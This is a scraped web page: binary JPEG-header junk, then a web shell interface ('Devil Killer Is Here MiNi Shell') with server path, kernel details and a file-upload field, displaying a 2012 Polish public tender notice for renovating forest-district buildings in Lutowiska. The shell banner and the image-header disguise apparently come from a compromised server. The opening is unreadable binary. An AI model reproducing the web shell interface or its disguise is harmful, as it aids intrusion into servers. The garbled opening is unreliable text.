JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121002/375060-N-2012.html

<p class="kh_header"><b>Lutowiska: Modernizacje i remonty budynków na terenie Nadleśnictwa Lutowiska. Zn. spr. NZ - 2710 - 14/12</b><br>
<b>Numer ogłoszenia: 375060 - 2012; data zamieszczenia: 02.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe Nadleśnictwo Lutowiska , Lutowiska 4, 38-713 Lutowiska, woj. podkarpackie, tel. 013 4610168 w. 43, faks 013 4610168.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krosno.lasy.gov.pl/web/lutowiska,  e-mail: lutowiska@krosno.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe - Nadleśnictwo Lutowiska.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacje i remonty budynków na terenie Nadleśnictwa Lutowiska. Zn. spr. NZ - 2710 - 14/12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót modernizacyjnych i remontowych w budynkach mieszkalnych i gospodarczych na terenie Nadleśnictwa Lutowiska.  Budynki zlokalizowane są na terenie gmin Lutowiska i Czarna w powiecie bieszczadzkim.
Zakres prac objętych przedmiotem zamówienia:
Przedmiot zamówienia podzielono na  cztery części:
Część I
- roboty modernizacyjne budynku jednorodzinnego Leśniczówka Paniszczew, nr inwent.165/30
Część II
- roboty modernizacyjne w budynku dwurodzinnego Lipie 14, nr inwent.165/93
Część III
- roboty modernizacyjne  budynku wielorodzinnego Smolnik 1, nr inwent.165/99
- roboty modernizacyjne  budynku gospodarczego (garaż-archiwum) w  Lutowiskach, nr inwent.187/94
Część IV
- roboty modernizacyjne i remontowe budynków gospodarczych: Lutowiska   nr inwent.182/25, Polana nr inwent.182/30, Sękowiec nr inwent.182/29

2. Zakres robót przewidziany do wykonania w poszczególnych zadaniach i obiektach:


Część I
 Zakres robót modernizacyjnych i remontowych w budynku jednorodzinnego leśniczówka Paniszczew w m.Olchowiec 2  przewidziany do wykonania:

1.	demontaż instalacji odgromowej na budynku
2.	rozbiórka pokrycia dachowego z płyt azbestowo- cementowych
3.	demontaż obróbek blacharskich dachu
4.	demontaż rynien dachowych i rur spustowych
5.	wymiana uszkodzonych elementów więźby dachowej oraz montaż łat na dachu
6.	dobudowanie elementów poszerzonej lukarny
7.	rozbiórka i ponowne przemurowanie górnych odcinków kominów oraz montaż czap kominowych
8.	montaż okna lukarny
9.	ułożenie folii paroprzepuszczalnej na połaciach dachowych
10.	ułożenie nowego pokrycia dachu z blachy trapezowej powlekanej
11.	montaż dachowego okna włazowego
12.	montaż nowych obróbek blacharskich
13.	montaż nowych rynien i rur spustowych
14.	wykonanie podbitki z desek struganych przy okapach dachu
15.	montaż instalacji odgromowej łącznie z otokiem wokół budynku pomiary elektryczne
16.	wymiana okien i stolarki drzwiowej łącznie z ościeżnicami 
17.	montaż ramowych rusztowań zewnętrznych elewacyjnych
18.	docieplenie elewacji warstwą styropianu z ułożeniem tynku akrylowego
19.	montaż zewnętrznych parapetów z blachy powlekanej
20.	rozbiórka zewnętrznych schodów żelbetowych
21.	przygotowanie deskowań nowych schodów zewnętrznych
22.	przygotowanie i montaż zbrojenia
23.	wylewanie schodów z betonu konstrukcyjnego 
24.	montaż balustrad schodowych ze stali nierdzewnej
25.	wykonanie okładzin schodów z płytek gresowych
26.	wymiana  podokienników wewnętrznych
27.	rozebranie części ścianek wewnętrznych
28.	demontaż boazerii oraz skucie starych, uszkodzonych tynków wewnętrznych
29.	rozebranie posadzek z tworzyw sztucznych łącznie z podłogami drewnianymi i legarami
30.	usunięcie podsypki podpodłogowej z gliny 
31.	wykonanie warstwy chudego betonu pod posadzki wylewane
32.	założenie izolacji z folii polietylenowej
33.	wykonanie wylewek z zaprawy cementowej zbrojonych wkładami z siatki zgrzewanej
34.	 wykonanie tynków wewnętrznych uzupełniających oraz gładzi gipsowych na ścianach
35.	montaż sufitów podwieszanych z płyt GKB 
36.	ułożenie podłóg z desek struganych z cyklinowaniem i lakierowaniem
37.	ułożenie posadzek z płytek gresowych
38.	licowanie ścian płytkami ceramicznymi
39.	roboty malarskie wewnętrzne
40.	wymiana drewnianych schodów wewnętrznych
41.	wymiana instalacji wewnętrznej wodociągowej
42.	wymiana instalacji c.o. wraz z kotłem na paliwo stałe
43.	wymiana instalacji wewnętrznej kanalizacyjnej
44.	wymiana armatury wodociągowej i kanalizacyjnej - montaż kabiny natryskowej, wanny z obudową, umywalki porcelanowej oraz miski ustępowej 
45.	wywiezienie gruzu z terenu budowy 
46.	utylizacja płyt azbestowo- cementowych pochodzących z rozbiórki 

Część II
Planowane roboty w budynku dwurodzinnym w Lipiu nr inwent. 165/93 mają na celu wydzielenie odrębnej kotłowni dla mieszkania nr 2 na II piętrze i poddaszu. Rozdzielone zostaną także instalacje centralnego ogrzewania na dwa niezależne układy. Projektuje się zainstalowanie kotła o mocy 16 kW. Zgodnie z zaleceniem inwestora projektuje się układ dwóch kominów - dymowy i wentylacyjny wykonane w technologii blach stalowych nierdzewnych . Konstrukcja komina dymowego z uwagi na agresywność spalin z kotła na paliwo stałe została przyjęta w wersji tzw. hybrydowej tj. płaszcz zewnętrzny i ocieplenie są tradycyjne, ale wewnętrzna konstrukcja kanału dymowego posiada zwiększoną odporność na agresją związków spalania węgla i drewna. Jest to kanał ceramiczny. Wentylacja w postaci kanału fi 200 mm z dociepleniem. Opis komina i oferta handlowa zawarta jest w projekcie.


Zakres robót przebudowy kotłowni w budynku Lipie 14, przewidziany do wykonania:

1	Odcięcie instalacji c.o. II piętra i poddasza na poziomie I piętra -     
            rozdzielenie instalacji
2	Montaż na starej instalacji zaworów odpowietrzających
3	Montaż naczynia wzbiorczego na I piętrze
4	Demontaż starych grzejników na II piętrze i poddaszu oraz instalacji c.o.
5	Wykonanie nowej instalacji c.o. na II piętrze i poddaszu od kotłowni aż 
           po naczynie wzbiorcze
6	Montaż nowych grzejników typu G500
7	Montaż osprzętu instalacji c.o. na poddaszu - naczynie wzbiorcze, przelew, 
           zawory odpowietrzające
8	Demontaż części ściany z nowej kotłowni
9	Budowa nowej ścianki działowej w miejscu wskazanym na projekcie
10	Wymiana drzwi w kotłowni
11	Przebicie otworu dla nowych drzwi z zewnątrz w miejscu istniejącego 
          okna
12	Wykonanie schodków do przejścia z zewnątrz
          (różnica poziomów ok. 60 cm)
13	Montaż zadaszenia nad wejściem z poliwęglanu
14	Wykonanie instalacji wodociągowej i kanalizacyjnej w nowej kotłowni łącznie z 
           kratką posadzkową
15	Instalacja elektryczna - oświetlenie, zasilanie 230 i 24 V
16	Nowa posadzka w kotłowni z izolacją poziomą z folii budowlanej
17	Okładziny posadzki i ścian z płytek
18	Montaż boksu na składowanie węgla lub drewna
19	Montaż okienka zasypowego od strony garażu
20	Montaż kotła węglowego
21	Montaż konstrukcji wsporczej kominów - dymowego i wentylacyjnego 
22	Montaż kominów ze stali nierdzewnej z wkładem ceramicznym 
23	Ustawienie rusztowań
24	Demontaż okładzin siding II piętra i poddasza na każdej elewacji
25	Mocowanie płyt z wełny mineralnej
26	Montaż sidingu i listew wykończeniowych
27	Wykonanie koryta pod chodnik przy budynku
28	Ułożenie podbudowy chodnika z kruszyw naturalnych
29	Ułożenie obrzeży chodnikowych
30	Ułożenie kostki brukowej gr. 6 cm na podsypce cementowo - piaskowej.

Część III
Zakres robót wymiany pokrycia i elementów konstrukcji stropodachu na budynku wielorodzinnym Smolnik 1, przewidziany do wykonania:
1. Rozbiórka pokrycia z papy na lepiku asfalt., obróbek blacharskich i instalacji 
    odgromowej,
2. Wzmocnienie istniejącej konstrukcji dachu przez dołożenie nowych kratownic 
     drewnianych i łacenia,
3. Przemurowanie odcinków kominów w części stropodachowej i ponad   
    dachem,
4. Ułożenie izolacji cieplnych i przeciwwilgociowych,
5. Montaż nowego pokrycia z blachy trapezowej powlekanej i obróbek 
    blacharskich,
6. Montaż orynnowania i rur spustowych,
7. Montaż instalacji odgromowej.


 Zakres robót wymiany pokrycia i elementów konstrukcji stropodachu na     
 budynku gospodarczego (garaż-archiwum) w  Lutowiskach, nr inwent.187/94, 
 przewidziany do wykonania:
      1. Rozbiórka pokrycia z papy na lepiku asfalt., obróbek blacharskich i instalacji 
          odgromowej,
2. Wzmocnienie istniejącej konstrukcji dachu przez dołożenie nowych kratownic 
    drewnianych i łacenia,
3. Przemurowanie odcinków kominów w części stropodachowej i ponad 
     dachem,
4. Ułożenie izolacji cieplnych i przeciwwilgociowych,
5. Montaż nowego pokrycia z blachy trapezowej powlekanej i obróbek 
     blacharskich,
6. Montaż rynien i rur spustowych,
7. Montaż instalacji odgromowej,
8. Wykonanie elewacji w technologii lekko-mokrej,
9. Wymiana stolarki okiennej i drzwiowej w istniejących otworach,
10. przemurowanie komina w kotłowni,
11. Wykonanie tynków cementowo-wapiennych i posadzki w pomieszczeniu 
      kotłownia.

  Część IV
  Zakres robót wymiany pokrycia budynków gospodarczych: Lutowiska   nr inwent.182/25, Polana nr inwent.182/30, Sękowiec nr inwent.182/29, przewidziany do wykonania:
       1.Rozbiórka pokryć dachowych z płyt azbestowo-cementowych falistych, obróbek blacharskich i instalacji odgromowej,
2. Wzmocnienie istniejącej konstrukcji dachu i łacenia,
3. Montaż nowego pokrycia z blachy trapezowej powlekanej i obróbek 
    blacharskich,
4. Montaż rynien i rur spustowych,
5. Montaż instalacji odgromowej
6. Wymiana zużytej stolarki okiennej i drzwiowej,
7. Naprawa tynków i malowanie emulsyjne elewacji


Szczegółowy opis robót do wykonania zawiera dokumentacja projektowa, przedmiary robót i specyfikacja techniczna wykonania i odbioru robót  które stanowią załączniki nr 2 a, b i c  do SIWZ  (dla poszczególnych części zamówienia).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o 
         których mowa w art. 67 ust. 1 pkt. 6 ustawy, polegających na powtórzeniu     
         prac będących przedmiotem zamówienia lub jego części o wartości do 50% 
         wartości zamówienia podstawowego w okresie 3 lat od udzielenia zamówienia 
        podstawowego (od terminu podpisania umowy).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.42.00.00-7, 45.32.10.00-3, 45.31.70.00-2, 45.33.00.00-9, 45.45.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda zabezpieczenia oferty w postaci wadium w 
wysokości  (na każdą część oddzielnie): 
Część I
- roboty modernizacyjne budynku jednorodzinnego Leśniczówka Paniszczew, nr inwent.165/30
7100 złotych.
Część II
- roboty modernizacyjne w budynku dwurodzinnego Lipie 14, nr inwent.165/93
7200 złotych.

Część III
- roboty modernizacyjne  budynku wielorodzinnego Smolnik 1, nr inwent.165/99
- roboty modernizacyjne  budynku gospodarczego (garaż-archiwum) w  Lutowiskach, nr inwent.187/94:
7300 złotych.
Część IV
- roboty modernizacyjne i remontowe budynków gospodarczych: Lutowiska   nr inwent.182/25, Polana nr inwent.182/30, Sękowiec nr inwent.182/29:
7 400,00 złotych.

	
    8.2.Wadium może być wnoszone w jednej lub kilku następujących  formach: 
        a) pieniądzu; 
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek wskazany przez Zamawiającego;
Numer rachunku bankowego na który należy wnosić wadium: 
 Bank BGŻ SA oddz. w Sanoku, 
 konto nr 26 2030 0045 1110 0000 0153 5050
z dopiskiem na  blankiecie przelewu, jakiego postępowania i jakiej części dotyczy,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e)  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
8.3. Wadium wnoszone w innych formach niż pieniądz należy deponować w oryginale w kasie w siedzibie Zamawiającego  do dnia składania ofert  19.10.2012r., do godz.14.00. Zamawiający dopuszcza złożenie oryginałów w/w dokumentów z ofertą. Gwarancja winna być nieodwołalna i bezwarunkowa. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta (poręczyciela). Poręczenie, gwarancja musi być podpisana   przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta (poręczyciela). Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem  imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe zobowiązanie Gwaranta do wpłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4 a i ust. 5 ustawy, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą.
8.4. Wadium musi być wniesione najpóźniej do wyznaczonego terminu    
      składania ofert tj. do dnia 19.10.2012r., do godz. 14.00
      Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym 
      terminie znajdzie się na rachunku bankowym Zamawiającego.
8.5. Wykonawca, który nie wniesie wadium zostanie wykluczony z postępowania, 
     a jego oferta zostanie uznana za odrzuconą.
a) Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza. 
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego,
  b)  Zamawiający niezwłocznie zwraca wadium na wniosek Wykonawcy który 
       wycofał ofertę przed upływem terminu składania ofert,
  c)   Wadium Wykonawcy zostanie zatrzymane wraz z odsetkami w przypadku, gdy  
       Wykonawca:
 -  Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.      
     3 nie złożył dokumentów lub oświadczeń, o których mowa w art.  25 ust. 1 lub  
     pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn  nieleżących po  
     jego stronie,
-   odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach  
    określonych w ofercie, 
-   nie wniósł należytego zabezpieczenia umowy,
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
     z przyczyn leżących po stronie Wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna że warunek będzie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu  -  załącznik  nr 3a do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w ciągu ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej  jedną robotę budowlaną o podobnym charakterze jaki obejmuje zamówienie o wartości nie niższej niż 100 tys. zł brutto (niezależnie od ilości części na które składa ofertę), potwierdzone referencjami, protokołami  odbioru robót, opiniami, listami polecającymi stwierdzającymi,  że roboty zostały  wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
        Ocena spełniania warunku  zostanie dokonana na podstawie  informacji i danych zawartych w dokumentach o których mowa w SIWZ tj. w oparciu o wykaz robót budowlanych wykonanych należycie w okresie ostatnich 5 lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie oraz dokumenty potwierdzające że zamówienia te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Poprzez posiadanie lub dysponowanie odpowiednim potencjałem technicznym Zamawiający rozumie zasoby sprzętowe pozostające w dyspozycji Wykonawcy gwarantujące wykonanie powierzonego zadania inwestycyjnego, złożone co najmniej z (niezależnie od ilości części na które Wykonawca składa ofertę):
-  zestaw elementów rusztowań zewnętrznych rurowych do wykonania powierzchni rusztowania wysokości min. 8m i powierzchni min. 80m2 lub inny zestaw rusztowań dopuszczony do stosowania przy robotach elewacyjnych odpowiednią aprobatą techniczną lub certyfikatem zgodności z Polskimi Normami,
-   transportem samochodowym - minimum: 1 samochód dostawczy oraz 1 samochód do przewozu osób.
         Ocena warunku zostanie dokonana na podstawie informacji i danych zawartych w dokumentach o których mowa SIWZ tj. w oparciu o: 
- wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń jakimi dysponuje Wykonawca (Załączniki   7 do SIWZ) wraz z informacją o podstawie dysponowania tymi zasobami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przez osoby zdolne do wykonania zamówienia uważa się dysponowanie do realizacji zamówienia co najmniej (niezależnie od ilości części na które Wykonawca składa ofertę): 5-cioma osobami zdolnymi do realizacji zamówienia tym jedną osobę posiadającą uprawnienia budowlane w zakresie kierowania robotami w specjalności konstrukcyjno-budowlanej, zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo  budowlane (Dz.U. z 2010 r. Nr 243 poz. 1623, ze zm.) albo odpowiadające im inne uprawnienie dopuszczone prawem lub dyrektywami. 

            W przypadku, gdy wskazane przez wykonawcę osoby są obywatelami państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej muszą one spełniać wymogi określone w art. 12a ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (tj. Dz.U. z 2010 r. Nr 243 poz. 1623, ze zm.).
         Ocena warunku zostanie dokonana na podstawie informacji i danych zawartych w dokumentach o których mowa SIWZ tj. w oparciu o: 

- o wykaz osób które będą uczestniczyć w wykonywaniu zamówienia, a także zakresu wykonywanych przez nie czynności wraz z informacjami na temat ich kwalifikacji zawodowych oraz informacją o podstawie dysponowania tymi osobami oraz w oparciu o oświadczenie, że osoba/y/, które będą uczestniczyć w wykonywaniu zamówienia posiada/ją/ wymagane uprawnienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać (niezależnie od ilości części na które składa ofertę):   

- że posiada środki finansowe  lub zdolność kredytową  albo obie te wielkości łącznie      
  w  wysokości nie mniejszej niż  100 tys. zł. 
- jest ubezpieczony od odpowiedzialności cywilnej (OC)   w zakresie prowadzonej 
  działalności związanej z przedmiotem zamówienia - na kwotę co najmniej 200 tys. 
   zł. 
        Ocena warunku w oparciu o załączony dokumenty  potwierdzający posiadanie ubezpieczenia oraz dokument/y/ potwierdzający posiadane środki finansowe lub zdolność kredytową  albo obie te wielkości łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
